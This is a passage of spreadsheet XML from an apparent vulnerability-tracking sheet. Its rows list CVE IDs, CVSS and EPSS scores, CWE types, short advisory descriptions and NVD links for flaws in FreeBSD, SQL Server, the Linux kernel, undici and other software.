      <c r="M817" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57866</t>
        </is>
      </c>
    </row>
    <row r="818">
      <c r="A818" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B818" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58095</t>
        </is>
      </c>
      <c r="C818" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D818" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E818" s="5" t="inlineStr"/>
      <c r="F818" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G818" s="5" t="inlineStr"/>
      <c r="H818" s="5" t="inlineStr">
        <is>
          <t>freebsd:freebsd</t>
        </is>
      </c>
      <c r="I818" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J818" s="5" t="inlineStr"/>
      <c r="K818" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L818" s="5" t="inlineStr">
        <is>
          <t>mp_Enddisc() used incorrect length calculations when formatting endpoint discriminator addresses for display, allowing a received endpoint option to overflow a global result buffer.
A malicious PPP peer can crash ppp(8) or potentially execute arbitrary code as root.</t>
        </is>
      </c>
      <c r="M818" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58095</t>
        </is>
      </c>
    </row>
    <row r="819">
      <c r="A819" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B819" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58096</t>
        </is>
      </c>
      <c r="C819" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D819" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E819" s="5" t="inlineStr"/>
      <c r="F819" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G819" s="5" t="inlineStr"/>
      <c r="H819" s="5" t="inlineStr">
        <is>
          <t>freebsd:freebsd</t>
        </is>
      </c>
      <c r="I819" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J819" s="5" t="inlineStr"/>
      <c r="K819" s="5" t="inlineStr">
        <is>
          <t>CWE-130, CWE-787</t>
        </is>
      </c>
      <c r="L819" s="5" t="inlineStr">
        <is>
          <t>LcpDecodeConfig() did not validate the length of received endpoint discriminator options against the minimum required by RFC 1717.  Undersized options would trigger an out-of-bounds write.
A malicious PPP peer can exploit CVE-2026-58095 and CVE-2026-58096 to crash ppp(8) or potentially execute arbitrary code as root.</t>
        </is>
      </c>
      <c r="M819" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58096</t>
        </is>
      </c>
    </row>
    <row r="820">
      <c r="A820" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B820" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61574</t>
        </is>
      </c>
      <c r="C820" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D820" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E820" s="5" t="inlineStr"/>
      <c r="F820" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G820" s="5" t="inlineStr"/>
      <c r="H820" s="5" t="inlineStr"/>
      <c r="I820" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J820" s="5" t="inlineStr"/>
      <c r="K820" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-863</t>
        </is>
      </c>
      <c r="L820" s="5" t="inlineStr">
        <is>
          <t>authentik is an open-source identity provider. Prior to 2026.2.6 and 2026.5.5, the Remote Access Control endpoint list returns every configured endpoint to any authenticated user regardless of which applications the user may access, and the response includes connection settings that can contain stored credentials. The endpoint listing does not apply the access controls governing the endpoints, and the connection flow does not confirm that an endpoint belongs to the Remote Access Control application through which it was launched. Any authenticated user can therefore read every endpoint together with its host and stored credentials and can open a connection to an endpoint belonging to another application. This exposes stored credentials for managed RDP, SSH, and VNC targets and grants interactive access to systems the user was never authorized to reach. Deployments that do not use the enterprise Remote Access Control provider are not affected. This issue is fixed in versions 2026.2.6 and 2026.5.5.</t>
        </is>
      </c>
      <c r="M820" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61574</t>
        </is>
      </c>
    </row>
    <row r="821">
      <c r="A821" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B821" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62316</t>
        </is>
      </c>
      <c r="C821" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D821" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E821" s="5" t="inlineStr"/>
      <c r="F821" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G821" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H821" s="5" t="inlineStr"/>
      <c r="I821" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J821" s="5" t="inlineStr"/>
      <c r="K821" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-346</t>
        </is>
      </c>
      <c r="L821" s="5" t="inlineStr">
        <is>
          <t>Microsoft UFO open-source framework for intelligent automation across devices and platforms. Prior to 3.0.8, ufo/client/mcp/http_servers/linux_mcp_server.py binds a FastMCP streamable HTTP server to localhost:8010 but does not validate the Host, Origin, or Sec-Fetch-Site headers. An attacker-controlled web page can use DNS rebinding to reach the local /mcp endpoint, enumerate tool schemas through tools/list, and invoke execute_command with a valid UFO_MCP_API_KEY to read files or execute allowed operating system commands as the victim's user. This issue is fixed in version 3.0.8.</t>
        </is>
      </c>
      <c r="M821" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62316</t>
        </is>
      </c>
    </row>
    <row r="822">
      <c r="A822" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B822" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62357</t>
        </is>
      </c>
      <c r="C822" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D822" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E822" s="5" t="inlineStr"/>
      <c r="F822" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G822" s="5" t="inlineStr"/>
      <c r="H822" s="5" t="inlineStr"/>
      <c r="I822" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J822" s="5" t="inlineStr"/>
      <c r="K822" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L822" s="5" t="inlineStr">
        <is>
          <t>Dragonfly is an in-memory data store built for modern application workloads. Prior to 1.40.0, CMS.INITBYDIM and CMS.INITBYPROB accept dimensions whose width times depth times sizeof(int64_t) overflows in src/core/cms.cc, allocating an undersized counter buffer while CMS.INCRBY and CMS.QUERY use the unbounded dimensions, which allows an unauthenticated remote client to corrupt or disclose adjacent heap memory and crash the server. This issue is fixed in version 1.40.0.</t>
        </is>
      </c>
      <c r="M822" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62357</t>
        </is>
      </c>
    </row>
    <row r="823">
      <c r="A823" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B823" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62666</t>
        </is>
      </c>
      <c r="C823" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D823" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E823" s="5" t="inlineStr"/>
      <c r="F823" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G823" s="5" t="inlineStr"/>
      <c r="H823" s="5" t="inlineStr"/>
      <c r="I823" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J823" s="5" t="inlineStr"/>
      <c r="K823" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="L823" s="5" t="inlineStr">
        <is>
          <t>Grav API Plugin is a RESTful API for Grav CMS that provides full headless access to your site's content. Prior to 1.0.6, Grav API plugin UsersController::createApiKey(), generate2fa(), and disable2fa() omit the accessGrantsSuper() target check used by sibling user mutation endpoints. A non-super account with api.users.write can mint an API key bound to an access.api.super target through requireApiKeyPermission(), obtain the target's full privileges because key scopes are not enforced, and create persistent super-administrator access; the same missing check also permits rotating or disabling the target's two-factor authentication. This issue is fixed in version 1.0.6.</t>
        </is>
      </c>
      <c r="M823" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62666</t>
        </is>
      </c>
    </row>
    <row r="824">
      <c r="A824" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B824" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62706</t>
        </is>
      </c>
      <c r="C824" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D824" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E824" s="5" t="inlineStr"/>
      <c r="F824" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G824" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H824" s="5" t="inlineStr"/>
      <c r="I824" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J824" s="5" t="inlineStr"/>
      <c r="K824" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-125</t>
        </is>
      </c>
      <c r="L824" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M824" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62706</t>
        </is>
      </c>
    </row>
    <row r="825">
      <c r="A825" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B825" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62744</t>
        </is>
      </c>
      <c r="C825" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D825" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E825" s="5" t="inlineStr"/>
      <c r="F825" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G825" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H825" s="5" t="inlineStr"/>
      <c r="I825" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J825" s="5" t="inlineStr"/>
      <c r="K825" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L825" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M825" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62744</t>
        </is>
      </c>
    </row>
    <row r="826">
      <c r="A826" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B826" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62895</t>
        </is>
      </c>
      <c r="C826" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D826" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E826" s="5" t="inlineStr"/>
      <c r="F826" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G826" s="5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="H826" s="5" t="inlineStr"/>
      <c r="I826" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J826" s="5" t="inlineStr"/>
      <c r="K826" s="5" t="inlineStr">
        <is>
          <t>CWE-1390, CWE-89, CWE-942</t>
        </is>
      </c>
      <c r="L826" s="5" t="inlineStr">
        <is>
          <t>Permissive cross-domain policy with untrusted domains in Azure Arc allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M826" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62895</t>
        </is>
      </c>
    </row>
    <row r="827">
      <c r="A827" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B827" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64364</t>
        </is>
      </c>
      <c r="C827" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D827" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E827" s="5" t="inlineStr"/>
      <c r="F827" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G827" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H827" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I827" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J827" s="5" t="inlineStr"/>
      <c r="K827" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L827" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: multitouch: fix out-of-bounds bit access on mt_io_flags
mt_io_flags is a single unsigned long, but mt_process_slot(),
mt_release_pending_palms() and mt_release_contacts() use it as a
per-slot bitmap indexed by the slot number. That slot number is only
bounded by td-&gt;maxcontacts, which is taken from the device's
ContactCountMaximum feature report and can be up to 255, not by
BITS_PER_LONG.
As a result, a multitouch device that advertises a large contact count
makes set_bit()/clear_bit() operate past the mt_io_flags word and
corrupt the adjacent members of struct mt_device. The sticky-fingers
release timer is the easiest way to reach this. mt_release_contacts()
runs
	for (i = 0; i &lt; mt-&gt;num_slots; i++)
		clear_bit(i, &amp;td-&gt;mt_io_flags);
with num_slots == maxcontacts. For maxcontacts around 250 the loop
clears the bits that overlap td-&gt;applications.next, zeroing that list
head, and the list_for_each_entry() that immediately follows then
dereferences NULL. The kernel panics from timer (softirq) context. On a
KASAN build this shows up as a general protection fault in
mt_release_contacts() with a null-ptr-deref at offset 0x58, which is
offsetof(struct mt_application, num_received).
The state is reachable from an untrusted USB or Bluetooth HID
multitouch device; no local privileges are required.
Store the per-slot active state in a separately allocated bitmap sized
for maxcontacts, the same pattern already used for pending_palm_slots,
and keep only MT_IO_FLAGS_RUNNING in mt_io_flags. The two
"mt_io_flags &amp; MT_IO_SLOTS_MASK" arming checks become
bitmap_empty(td-&gt;active_slots, td-&gt;maxcontacts).
Move MT_IO_FLAGS_RUNNING back to bit 0. It was bumped to bit 32 by the
same commit to leave the low byte for the slot bits; with the slot bits
gone it fits in bit 0 again, which also keeps it within the unsigned
long on 32-bit.</t>
        </is>
      </c>
      <c r="M827" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64364</t>
        </is>
      </c>
    </row>
    <row r="828">
      <c r="A828" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B828" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65772</t>
        </is>
      </c>
      <c r="C828" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D828" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E828" s="5" t="inlineStr"/>
      <c r="F828" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G828" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H828" s="5" t="inlineStr"/>
      <c r="I828" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J828" s="5" t="inlineStr"/>
      <c r="K828" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L828" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data in Microsoft Dynamics 365 allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M828" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65772</t>
        </is>
      </c>
    </row>
    <row r="829">
      <c r="A829" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B829" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66814</t>
        </is>
      </c>
      <c r="C829" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D829" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E829" s="5" t="inlineStr"/>
      <c r="F829" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G829" s="5" t="inlineStr"/>
      <c r="H829" s="5" t="inlineStr"/>
      <c r="I829" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J829" s="5" t="inlineStr"/>
      <c r="K829" s="5" t="inlineStr">
        <is>
          <t>CWE-1220</t>
        </is>
      </c>
      <c r="L829" s="5" t="inlineStr">
        <is>
          <t>Insufficient granularity of access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M829" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66814</t>
        </is>
      </c>
    </row>
    <row r="830">
      <c r="A830" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B830" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66818</t>
        </is>
      </c>
      <c r="C830" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D830" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E830" s="5" t="inlineStr"/>
      <c r="F830" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G830" s="5" t="inlineStr"/>
      <c r="H830" s="5" t="inlineStr"/>
      <c r="I830" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J830" s="5" t="inlineStr"/>
      <c r="K830" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L830" s="5" t="inlineStr">
        <is>
          <t>Improper privilege management in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M830" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66818</t>
        </is>
      </c>
    </row>
    <row r="831">
      <c r="A831" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B831" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66819</t>
        </is>
      </c>
      <c r="C831" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D831" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E831" s="5" t="inlineStr"/>
      <c r="F831" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G831" s="5" t="inlineStr"/>
      <c r="H831" s="5" t="inlineStr"/>
      <c r="I831" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J831" s="5" t="inlineStr"/>
      <c r="K831" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L831" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M831" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66819</t>
        </is>
      </c>
    </row>
    <row r="832">
      <c r="A832" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B832" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66820</t>
        </is>
      </c>
      <c r="C832" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D832" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E832" s="5" t="inlineStr"/>
      <c r="F832" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G832" s="5" t="inlineStr"/>
      <c r="H832" s="5" t="inlineStr"/>
      <c r="I832" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J832" s="5" t="inlineStr"/>
      <c r="K832" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L832" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M832" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66820</t>
        </is>
      </c>
    </row>
    <row r="833">
      <c r="A833" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B833" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6734</t>
        </is>
      </c>
      <c r="C833" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D833" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E833" s="5" t="inlineStr"/>
      <c r="F833" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G833" s="5" t="inlineStr"/>
      <c r="H833" s="5" t="inlineStr">
        <is>
          <t>nodejs:undici</t>
        </is>
      </c>
      <c r="I833" s="5" t="inlineStr">
        <is>
          <t>2026-06-17</t>
        </is>
      </c>
      <c r="J833" s="5" t="inlineStr"/>
      <c r="K833" s="5" t="inlineStr">
        <is>
          <t>CWE-346, CWE-940</t>
        </is>
      </c>
      <c r="L833" s="5" t="inlineStr">
        <is>
          <t>Impact:
When using Socks5ProxyAgent, undici reuses a single connection pool across different origins without verifying that the pool's origin matches the requested origin. All requests are dispatched through the pool connected to the first origin, regardless of the intended destination.
This causes cross-origin request routing: credentials and request data intended for origin B are sent to origin A, responses from the wrong origin are trusted, and HTTPS requests may be silently downgraded to HTTP.
Impacted users are applications that use Socks5ProxyAgent (directly or via setGlobalDispatcher) and make requests to more than one origin.
This was introduced in undici 7.23.0 via PR #4385 and affects all versions through 8.1.0.
Patches:
Upgrade to undici v7.26.0 or v8.2.0.
Workarounds:
Use a separate Socks5ProxyAgent instance per origin, or avoid using Socks5ProxyAgent with multiple origins.</t>
        </is>
      </c>
      <c r="M833" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6734</t>
        </is>
      </c>
    </row>
    <row r="834">
      <c r="A834" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B834" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67368</t>
        </is>
      </c>
      <c r="C834" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D834" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E834" s="5" t="inlineStr"/>
      <c r="F834" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G834" s="5" t="inlineStr"/>
      <c r="H834" s="5" t="inlineStr"/>
      <c r="I834" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J834" s="5" t="inlineStr"/>
      <c r="K834" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L834" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M834" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67368</t>
        </is>
      </c>
    </row>
    <row r="835">
      <c r="A835" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B835" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67370</t>
        </is>
      </c>
      <c r="C835" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D835" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E835" s="5" t="inlineStr"/>
      <c r="F835" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G835" s="5" t="inlineStr"/>
      <c r="H835" s="5" t="inlineStr"/>
      <c r="I835" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J835" s="5" t="inlineStr"/>
      <c r="K835" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L835" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M835" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67370</t>
        </is>
      </c>
    </row>
    <row r="836">
      <c r="A836" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B836" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67373</t>
        </is>
      </c>
      <c r="C836" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D836" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E836" s="5" t="inlineStr"/>
      <c r="F836" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G836" s="5" t="inlineStr"/>
      <c r="H836" s="5" t="inlineStr"/>
      <c r="I836" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J836" s="5" t="inlineStr"/>
      <c r="K836" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L836" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M836" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67373</t>
        </is>
      </c>
    </row>
    <row r="837">
      <c r="A837" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B837" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67380</t>
        </is>
      </c>
      <c r="C837" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D837" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E837" s="5" t="inlineStr"/>
      <c r="F837" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G837" s="5" t="inlineStr"/>
      <c r="H837" s="5" t="inlineStr"/>
      <c r="I837" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J837" s="5" t="inlineStr"/>
      <c r="K837" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L837" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M837" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67380</t>
        </is>
      </c>
    </row>
    <row r="838">
      <c r="A838" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B838" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67381</t>
        </is>
      </c>
      <c r="C838" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D838" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E838" s="5" t="inlineStr"/>
      <c r="F838" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G838" s="5" t="inlineStr"/>
      <c r="H838" s="5" t="inlineStr"/>
      <c r="I838" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J838" s="5" t="inlineStr"/>
      <c r="K838" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L838" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M838" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67381</t>
        </is>
      </c>
    </row>
    <row r="839">
      <c r="A839" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B839" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67384</t>
        </is>
      </c>
      <c r="C839" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D839" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E839" s="5" t="inlineStr"/>
      <c r="F839" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G839" s="5" t="inlineStr"/>
      <c r="H839" s="5" t="inlineStr"/>
      <c r="I839" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J839" s="5" t="inlineStr"/>
      <c r="K839" s="5" t="inlineStr">
